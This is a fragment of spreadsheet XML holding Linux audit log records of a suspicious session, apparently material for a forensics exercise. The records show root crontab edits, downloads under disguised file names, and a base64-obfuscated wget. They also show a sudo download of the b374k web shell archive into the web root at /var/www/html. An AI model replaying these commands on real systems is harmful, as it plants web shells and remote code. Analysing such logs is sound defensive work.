    <t>proctitle=776765740068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F796F6864656570736E6F772F707974686F6E666F7264756D6D6965732F6D61737465722F6D61696E2E7079002D6F007363726970742E7079</t>
  </si>
  <si>
    <t>msg=audit(1584777558.374:973):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53d0df0 a1=5591c53a9700 a2=5591c53a9220 a3=5591c5395010 items=2 ppid=2175 pid=2608 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="ifconfig" exe="/sbin/ifconfig" key="sbin_susp"</t>
  </si>
  <si>
    <t>msg=audit(1584777577.314:974):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53a97a0 a1=5591c53d1a70 a2=5591c53a9220 a3=5591c5395010 items=2 ppid=2175 pid=2647 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=105 sgid=105 fsgid=105 tty=pts2 ses=4 comm="crontab" exe="/usr/bin/crontab" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="crontab" a1="-e"</t>
  </si>
  <si>
    <t>proctitle=63726F6E746162002D65</t>
  </si>
  <si>
    <t>msg=audit(1584777577.330:975):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5617d0c93927 a1=7ffdda878380 a2=7ffdda878c30 a3=1 items=2 ppid=2647 pid=2648 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="sh" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-c" a2=2F7573722F62696E2F73656E7369626C652D656469746F72202F746D702F63726F6E7461622E58476634304C2F63726F6E746162</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002D63002F7573722F62696E2F73656E7369626C652D656469746F72202F746D702F63726F6E7461622E58476634304C2F63726F6E746162</t>
  </si>
  <si>
    <t>msg=audit(1584777577.330:976):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=561be50aab48 a1=561be50aabb0 a2=561be50aabc8 a3=7f130da64810 items=3 ppid=2648 pid=2649 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="sensible-editor" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="/usr/bin/sensible-editor" a2="/tmp/crontab.XGf40L/crontab"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F62696E2F73656E7369626C652D656469746F72002F746D702F63726F6E7461622E58476634304C2F63726F6E746162</t>
  </si>
  <si>
    <t>msg=audit(1584777577.338:977):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d948e5d988 a1=55d94788bbd0 a2=55d948e5d8b8 a3=55d948e5d010 items=3 ppid=2649 pid=2650 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="which" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="/usr/bin/which" a2="sensible-editor"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F62696E2F77686963680073656E7369626C652D656469746F72</t>
  </si>
  <si>
    <t>msg=audit(1584777577.374:978):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d948e5da70 a1=55d948e5d990 a2=55d948e5d9a0 a3=7f1d18394810 items=3 ppid=2651 pid=2652 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="which" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/usr/bin/which"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F62696E2F7768696368</t>
  </si>
  <si>
    <t>msg=audit(1584777577.374:979):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d948e5da70 a1=55d948e5d990 a2=55d948e5d9a0 a3=7f1d18394810 items=3 ppid=2653 pid=2654 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="which" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777577.374:980):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d948e5da90 a1=55d948e5d9b0 a2=55d948e5d9c0 a3=7f1d18394810 items=3 ppid=2655 pid=2656 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="which" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777577.378:981):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d948e5def0 a1=55d948e5de10 a2=55d948e5de20 a3=7f1d18394810 items=3 ppid=2649 pid=2657 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="select-editor" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/usr/bin/select-editor"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F7573722F62696E2F73656C6563742D656469746F72</t>
  </si>
  <si>
    <t>msg=audit(1584777577.390:982):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde229f8 a1=5623fc3fec00 a2=5623fde22928 a3=5623fde22010 items=2 ppid=2657 pid=2658 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="touch" exe="/bin/touch" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="touch" a1="/root/.selected_editor"</t>
  </si>
  <si>
    <t>proctitle=746F756368002F726F6F742F2E73656C65637465645F656469746F72</t>
  </si>
  <si>
    <t>msg=audit(1584777577.422:983):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde22a50 a1=5623fde22968 a2=5623fde22980 a3=5623fde22010 items=2 ppid=2659 pid=2661 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="wc" exe="/usr/bin/wc" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="wc" a1="-l"</t>
  </si>
  <si>
    <t>proctitle=7763002D6C</t>
  </si>
  <si>
    <t>msg=audit(1584777577.426:984):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde22a78 a1=5623fde22988 a2=5623fde229a8 a3=5623fde22010 items=2 ppid=2659 pid=2660 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="update-alternat" exe="/usr/bin/update-alternatives" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="update-alternatives" a1="--list" a2="editor"</t>
  </si>
  <si>
    <t>proctitle=7570646174652D616C7465726E617469766573002D2D6C69737400656469746F72</t>
  </si>
  <si>
    <t>msg=audit(1584777577.466:985):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25228 a1=5623fde25140 a2=5623fde25158 a3=5623fde22010 items=2 ppid=2657 pid=2662 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="gettext" exe="/usr/bin/gettext" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="gettext" a1=53656C65637420616E20656469746F722E2020546F206368616E6765206C617465722C2072756E</t>
  </si>
  <si>
    <t>proctitle=676574746578740053656C65637420616E20656469746F722E2020546F206368616E6765206C617465722C2072756E</t>
  </si>
  <si>
    <t>msg=audit(1584777577.490:986):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25268 a1=5623fde25170 a2=5623fde25198 a3=5623fde22010 items=2 ppid=2663 pid=2667 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777577.490:987):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25258 a1=5623fde25168 a2=5623fde25188 a3=5623fde22010 items=2 ppid=2663 pid=2664 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="update-alternat" exe="/usr/bin/update-alternatives" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="update-alternatives" a1="--query" a2="editor"</t>
  </si>
  <si>
    <t>proctitle=7570646174652D616C7465726E617469766573002D2D717565727900656469746F72</t>
  </si>
  <si>
    <t>msg=audit(1584777577.490:988):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25248 a1=5623fde25158 a2=5623fde25178 a3=5623fde22010 items=2 ppid=2663 pid=2666 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="sort" exe="/usr/bin/sort" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="sort" a1="-n" a2="-r"</t>
  </si>
  <si>
    <t>proctitle=736F7274002D6E002D72</t>
  </si>
  <si>
    <t>msg=audit(1584777577.510:989):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25280 a1=5623fde25188 a2=5623fde251b0 a3=5623fde22010 items=2 ppid=2657 pid=2668 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="expr" exe="/usr/bin/expr" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="expr" a1="0" a2="+" a3="1"</t>
  </si>
  <si>
    <t>proctitle=657870720030002B0031</t>
  </si>
  <si>
    <t>msg=audit(1584777577.510:990):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25258 a1=5623fde25170 a2=5623fde25188 a3=5623fde22010 items=2 ppid=2657 pid=2669 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="gettext" exe="/usr/bin/gettext" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="gettext" a1="easiest"</t>
  </si>
  <si>
    <t>proctitle=676574746578740065617369657374</t>
  </si>
  <si>
    <t>msg=audit(1584777577.510:991):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25280 a1=5623fde25188 a2=5623fde251b0 a3=5623fc1f6962 items=2 ppid=2657 pid=2670 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="expr" exe="/usr/bin/expr" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="expr" a1="1" a2="+" a3="1"</t>
  </si>
  <si>
    <t>proctitle=657870720031002B0031</t>
  </si>
  <si>
    <t>msg=audit(1584777577.514:992):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25280 a1=5623fde25188 a2=5623fde251b0 a3=5623fc1f6962 items=2 ppid=2657 pid=2671 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="expr" exe="/usr/bin/expr" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="expr" a1="2" a2="+" a3="1"</t>
  </si>
  <si>
    <t>proctitle=657870720032002B0031</t>
  </si>
  <si>
    <t>msg=audit(1584777577.514:993):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25098 a1=5623fde250c0 a2=5623fde25138 a3=7f41dcba2810 items=2 ppid=2657 pid=2672 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="true" exe="/bin/true" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=1 a0="/bin/true"</t>
  </si>
  <si>
    <t>proctitle="/bin/true"</t>
  </si>
  <si>
    <t>msg=audit(1584777577.518:994):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25228 a1=5623fde25140 a2=5623fde25158 a3=5623fde22010 items=2 ppid=2657 pid=2673 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="gettext" exe="/usr/bin/gettext" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="gettext" a1="Choose"</t>
  </si>
  <si>
    <t>proctitle=676574746578740043686F6F7365</t>
  </si>
  <si>
    <t>msg=audit(1584777584.602:995):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25098 a1=5623fde250c0 a2=5623fde25138 a3=7f41dcba2810 items=2 ppid=2657 pid=2688 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="true" exe="/bin/true" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777584.602:996):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5623fde25280 a1=5623fde25188 a2=5623fde251b0 a3=5623fc1f6962 items=2 ppid=2657 pid=2689 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="expr" exe="/usr/bin/expr" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777584.602:997):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55d94788bb38 a1=55d94788bb90 a2=55d94788bba8 a3=7f1d18394810 items=2 ppid=2649 pid=2690 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="nano" exe="/bin/nano" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/nano" a1="/tmp/crontab.XGf40L/crontab"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F6E616E6F002F746D702F63726F6E7461622E58476634304C2F63726F6E746162</t>
  </si>
  <si>
    <t>msg=audit(1584777585.358:998):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=93 success=yes exit=0 a0=24 a1=3e8 a2=3e8 a3=1b6 items=1 ppid=1444 pid=1582 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=tty2 ses=3 comm="gnome-shell" exe="/usr/bin/gnome-shell" key="perm_mod"</t>
  </si>
  <si>
    <t>proctitle="/usr/bin/gnome-shell"</t>
  </si>
  <si>
    <t>msg=audit(1584777585.358:999):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=91 success=yes exit=0 a0=24 a1=81b4 a2=3e8 a3=1b6 items=1 ppid=1444 pid=1582 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=tty2 ses=3 comm="gnome-shell" exe="/usr/bin/gnome-shell" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777620.538:1000):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d8705a90 a1=5591d8800b30 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2766 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=4 a0="wget" a1="https://elcicko.com/wp-content/uploads/2019/10/instalasi-golang.png" a2="-O" a3="golang"</t>
  </si>
  <si>
    <t>proctitle=776765740068747470733A2F2F656C6369636B6F2E636F6D2F77702D636F6E74656E742F75706C6F6164732F323031392F31302F696E7374616C6173692D676F6C616E672E706E67002D4F00676F6C616E67</t>
  </si>
  <si>
    <t>msg=audit(1584777634.646:1001):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591c53cfb00 a1=5591c53d1a90 a2=5591c53a9220 a3=5591c5395010 items=2 ppid=2175 pid=2795 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=4 comm="ifconfig" exe="/sbin/ifconfig" key="sbin_susp"</t>
  </si>
  <si>
    <t>msg=audit(1584777639.374:1002):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d870ffc0 a1=5591d8800b30 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2806 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=4 a0="wget" a1="https://raw.githubusercontent.com/yohdeepsnow/pythonfordummies/master/main.py" a2="-O" a3="script.py"</t>
  </si>
  <si>
    <t>proctitle=776765740068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F796F6864656570736E6F772F707974686F6E666F7264756D6D6965732F6D61737465722F6D61696E2E7079002D4F007363726970742E7079</t>
  </si>
  <si>
    <t>msg=audit(1584777649.631:1003):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d87cdae0 a1=5591d8800b30 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2827 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=4 a0="wget" a1="https://petircysec.com/wp-content/uploads/2019/11/1537984792995_resize.png" a2="-O" a3="tander.png"</t>
  </si>
  <si>
    <t>proctitle=776765740068747470733A2F2F706574697263797365632E636F6D2F77702D636F6E74656E742F75706C6F6164732F323031392F31312F313533373938343739323939355F726573697A652E706E67002D4F0074616E6465722E706E67</t>
  </si>
  <si>
    <t>msg=audit(1584777666.015:1004):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d882e920 a1=5591d8821d20 a2=5591d8712cb0 a3=8 items=2 ppid=2864 pid=2866 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="base64" exe="/usr/bin/base64" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=2 a0="base64" a1="--decode"</t>
  </si>
  <si>
    <t>proctitle=626173653634002D2D6465636F6465</t>
  </si>
  <si>
    <t>msg=audit(1584777666.039:1005):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d876d860 a1=5591d8821d20 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2867 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=5 a0=wget a1=$(echo aHR0cHM6Ly9naXRodWIuY29tL2IzNzRrL2IzNzRrL2FyY2hpdmUvbWFzdGVyLnppcA== a2=| a3=base64 a4=--decode)</t>
  </si>
  <si>
    <t>proctitle=776765740068747470733A2F2F6769746875622E636F6D2F623337346B2F623337346B2F617263686976652F6D61737465722E7A6970</t>
  </si>
  <si>
    <t>msg=audit(1584777676.939:1006):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d882c770 a1=5591d87f0b80 a2=5591d8712cb0 a3=8 items=2 ppid=2888 pid=2890 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="base64" exe="/usr/bin/base64" key="susp_activity"</t>
  </si>
  <si>
    <t>msg=audit(1584777676.943:1007):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d8827db0 a1=5591d876fae0 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2891 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>argc=3 a0="sudo" a1="wget" a2="https://github.com/b374k/b374k/archive/master.zip"</t>
  </si>
  <si>
    <t>proctitle=7375646F00776765740068747470733A2F2F6769746875622E636F6D2F623337346B2F623337346B2F617263686976652F6D61737465722E7A6970</t>
  </si>
  <si>
    <t>msg=audit(1584777676.943:1008):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7f66a1b79df7 a2=0 a3=0 items=1 ppid=2386 pid=2891 auid=1000 uid=0 gid=1000 euid=1 suid=0 fsuid=1 egid=0 sgid=1000 fsgid=0 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1009):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=5 a0=ffffff9c a1=7f66a23cb2a3 a2=80000 a3=0 items=1 ppid=2386 pid=2891 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="etcpasswd"</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1010):</t>
  </si>
  <si>
    <t>pid=2891 uid=1000 auid=1000 ses=6 msg='op=PAM:authentication acct="zapdos" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1011):</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1012):</t>
  </si>
  <si>
    <t>pid=2891 uid=1000 auid=1000 ses=6 msg='op=PAM:accounting acct="zapdos" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>type=USER_CMD</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1013):</t>
  </si>
  <si>
    <t>pid=2891 uid=1000 auid=1000 ses=6 msg='cwd="/var/www/html" cmd=776765742068747470733A2F2F6769746875622E636F6D2F623337346B2F623337346B2F617263686976652F6D61737465722E7A6970 terminal=pts/3 res=success'</t>
  </si>
  <si>
    <t>type=CRED_REFR</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1014):</t>
  </si>
  <si>
    <t>pid=2891 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777679.371:1015):</t>
  </si>
  <si>
    <t>pid=2891 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777679.375:1016):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5620e9bccb78 a1=5620e9bd4fa8 a2=5620e9bc53d0 a3=0 items=2 ppid=2891 pid=2898 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=2 a0="wget" a1="https://github.com/b374k/b374k/archive/master.zip"</t>
  </si>
  <si>
    <t>type=USER_END</t>
  </si>
  <si>
    <t>msg=audit(1584777684.607:1017):</t>
  </si>
  <si>
    <t>pid=2891 uid=0 auid=1000 ses=6 msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>type=CRED_DISP</t>
  </si>
  <si>
    <t>msg=audit(1584777684.607:1018):</t>
  </si>
  <si>
    <t>msg=audit(1584777701.200:1019):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d8713c50 a1=5591d882d0a0 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2945 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=2 a0="wget" a1="https://tfj.tjfijl.frl/a12d7a9eb2bb6efc2478a9011f112849/Izpmu7xHHdc"</t>
  </si>
  <si>
    <t>proctitle=776765740068747470733A2F2F74666A2E746A66696A6C2E66726C2F61313264376139656232626236656663323437386139303131663131323834392F497A706D75377848486463</t>
  </si>
  <si>
    <t>msg=audit(1584777723.380:1020):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d882d7b0 a1=5591d8826260 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2990 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=2 a0="wget" a1="http://archive.ubuntu.com/ubuntu/pool/universe/p/python-pip/python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>proctitle=7767657400687474703A2F2F617263686976652E7562756E74752E636F6D2F7562756E74752F706F6F6C2F756E6976657273652F702F707974686F6E2D7069702F707974686F6E2D7069705F392E302E312D325F616C6C2E646562</t>
  </si>
  <si>
    <t>msg=audit(1584777727.800:1021):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d8786e60 a1=5591d8701be0 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=3000 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>argc=3 a0="sudo" a1="wget" a2="http://archive.ubuntu.com/ubuntu/pool/universe/p/python-pip/python-pip_9.0.1-2_all.deb"</t>
  </si>
  <si>
    <t>proctitle=7375646F007767657400687474703A2F2F617263686976652E7562756E74752E636F6D2F7562756E74752F706F6F6C2F756E6976657273652F702F707974686F6E2D7069702F707974686F6E2D7069705F392E302E312D325F616C6C2E646562</t>
  </si>
  <si>
    <t>msg=audit(1584777727.804:1022):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffacb168df7 a2=0 a3=0 items=1 ppid=2386 pid=3000 auid=1000 uid=0 gid=1000 euid=1 suid=0 fsuid=1 egid=0 sgid=1000 fsgid=0 tty=pts3 ses=6 comm="sudo" exe="/usr/bin/sudo" key="priv_esc"</t>
  </si>
  <si>
    <t>msg=audit(1584777727.808:1023):</t>
  </si>
  <si>
    <t>pid=3000 uid=1000 auid=1000 ses=6 msg='cwd="/var" cmd=7767657420687474703A2F2F617263686976652E7562756E74752E636F6D2F7562756E74752F706F6F6C2F756E6976657273652F702F707974686F6E2D7069702F707974686F6E2D7069705F392E302E312D325F616C6C2E646562 terminal=pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777727.808:1024):</t>
  </si>
  <si>
    <t>pid=3000 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777727.808:1025):</t>
  </si>
  <si>
    <t>pid=3000 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777727.812:1026):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=560348d9cb78 a1=560348da4fa8 a2=560348d96bc0 a3=0 items=2 ppid=3000 pid=3001 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>msg=audit(1584777730.816:1027):</t>
  </si>
  <si>
    <t>pid=3000 uid=0 auid=1000 ses=6 msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777730.816:1028):</t>
  </si>
  <si>
    <t>msg=audit(1584777755.397:1029):</t>
  </si>
  <si>
